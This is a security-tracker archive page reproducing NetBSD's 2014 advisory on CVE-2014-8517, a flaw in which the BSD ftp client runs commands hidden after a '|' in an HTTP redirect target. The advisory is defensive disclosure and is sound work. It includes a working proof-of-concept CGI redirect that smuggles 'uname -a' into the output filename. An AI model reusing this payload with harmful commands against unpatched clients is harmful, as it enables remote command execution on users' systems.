Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (File Transfer/Sharing)  >   FTP (Generic) Vendors:   NetBSD
(NetBSD Issues Fix) BSD FTP Client HTTP Redirect Flaw Lets Remote Servers Execute Arbitrary Commands on the Target User's System
SecurityTracker Alert ID:  1031154
SecurityTracker URL:
CVE Reference:   CVE-2014-8517   (Links to External Site)
Date:  Nov 3 2014
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  

Description:   A vulnerability was reported in some BSD-based FTP clients. A remote user can cause arbitrary commands to be executed on the target user's system.

A remote FTP server can return a specially crafted HTTP redirect to a connected client to cause the target client to execute arbitrary commands on the target system.

The vulnerability can be triggered in response to an FTP command for an HTTP resource when '-o' (output file) is not specified.

NetBSD tnftp(1) is affected. In NetBSD, the vulnerability resides in 'src/usr.bin/ftp/fetch.c'.

Apple OS X is affected.

FreeBSD is affected.

OpenBSD is not affected.

Other BSD-based systems may be affected.

Jared Mcneill reported this vulnerability.

Impact:   A remote user can cause arbitrary commands to be executed on the target connected user's system.
Solution:   NetBSD has issued a fix.

The NetBSD advisory is available at:

Vendor URL: (Links to External Site)
Cause:   Access control error
Underlying OS:  UNIX (NetBSD)
Underlying OS Comments:  5.1, 5.2, 6.0, 6.1

Message History:   This archive entry is a follow-up to the message listed below.
Oct 30 2014 BSD FTP Client HTTP Redirect Flaw Lets Remote Servers Execute Arbitrary Commands on the Target User's System

 Source Message Contents

Subject:  NetBSD Security Advisory 2014-013: ftp(1) can be made to execute arbitrary commands by a malicious webserver

Hash: SHA1

		NetBSD Security Advisory 2014-013

Topic:		ftp(1) can be made to execute arbitrary commands
		by a malicious webserver

Version:	NetBSD-current:		source prior to Oct 27th, 2014
		NetBSD 6.1 - 6.1.5:	affected
		NetBSD 6.0 - 6.0.6:	affected
		NetBSD 5.1 - 5.1.4:	affected
		NetBSD 5.2 - 5.2.2:	affected
		pkgsrc (net/tnftp)	affected

Severity:	remote command execution

Fixed:		NetBSD-current:		Oct 26th, 2014
		NetBSD-7 branch:	Oct 26th, 2014
		NetBSD-6-0 branch:	Oct 27th, 2014
		NetBSD-6-1 branch:	Oct 27th, 2014
		NetBSD-6 branch:	Oct 27th, 2014
		NetBSD-5-2 branch:	Oct 27th, 2014
		NetBSD-5-1 branch:	Oct 27th, 2014
		NetBSD-5 branch:	Oct 27th, 2014
		pkgsrc:			in version 20141031

Teeny versions released later than the fix date will contain the fix.

Please note that NetBSD releases prior to 5.1 are no longer supported.
It is recommended that all users upgrade to a supported release.


A malicious http server can cause ftp(1) to execute arbitrary commands.

This vulnerability has been assigned CVE-2014-8517.

Technical Details

If the ftp(1) program is used to act as http client and fetch data from
a website, and no output file is passed via the -o argument, the client
can be tricked into executing arbitrary commands.
When acting as http client, the ftp(1) program will follow http redirects,
and uses the part of the path after the last '/' from the last resource
it accesses as the output filename (as long as -o filename is not

After the output filename is resolved by the ftp client, if the rest
of the output filename begins with a '|', the output filename is
passed to popen(3).

Thus, a malicious web site could hide '|command' in a redirect and make
the client execute 'command' when ftp fetched that URL.

     a20$ pwd
     a20$ ls -l
     total 4
     -rwxr-xr-x  1 root  wheel  159 Oct 14 02:02 redirect
     -rwxr-xr-x  1 root  wheel  178 Oct 14 01:54 |uname -a
     a20$ cat redirect
     echo 'Status: 302 Found'
     echo 'Content-Type: text/html'
     echo 'Connection: keep-alive'
     echo 'Location:|uname%20-a'

     a20$ ftp http://localhost/cgi-bin/redirect
     Trying ::1:80 ...
     ftp: Can't connect to `::1:80': Connection refused
     Trying ...
     Requesting http://localhost/cgi-bin/redirect
     Redirected to|uname%20-a
         32      101.46 KiB/s
     32 bytes retrieved in 00:00 (78.51 KiB/s)
     NetBSD a20 7.99.1 NetBSD 7.99.1 (CUBIEBOARD) #113: Sun Oct 26 12:05:36
     ADT 2014
     BOARD evbarm

Solutions and Workarounds

Workaround: specifying an output filename by using "ftp -o <filename>"
circumvents the issue.

Get a new ftp binary:

VERS being your NetBSD version
DATE being a build date past the fix date for your version
ARCH being your machine architecture
ftp -o /var/tmp/base.tgz
cd /
tar xzpf /var/tmp/base.tgz ./usr/bin/ftp

or build a new ftp binary from source.

Affected file: src/usr.bin/ftp/fetch.c
Fixed versions:
HEAD         1.206

Thanks To

Thanks to Jared McNeill, who found the issue by code inspection, and
Christos Zoulas for changing ftp(1) to only use | commands for user
supplied names.

Revision History

	2014-11-03	Initial release

More Information

Advisories may be updated as new information becomes available.
The most recent version of this advisory (PGP signed) can be found at

Information about NetBSD and NetBSD security can be found at and .

Copyright 2014, The NetBSD Foundation, Inc.  All Rights Reserved.
Redistribution permitted only in full, unmodified form.

$NetBSD: NetBSD-SA2014-013.txt,v 1.1 2014/11/02 22:17:45 spz Exp $

Version: GnuPG v1.4.15 (NetBSD)


Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, LLC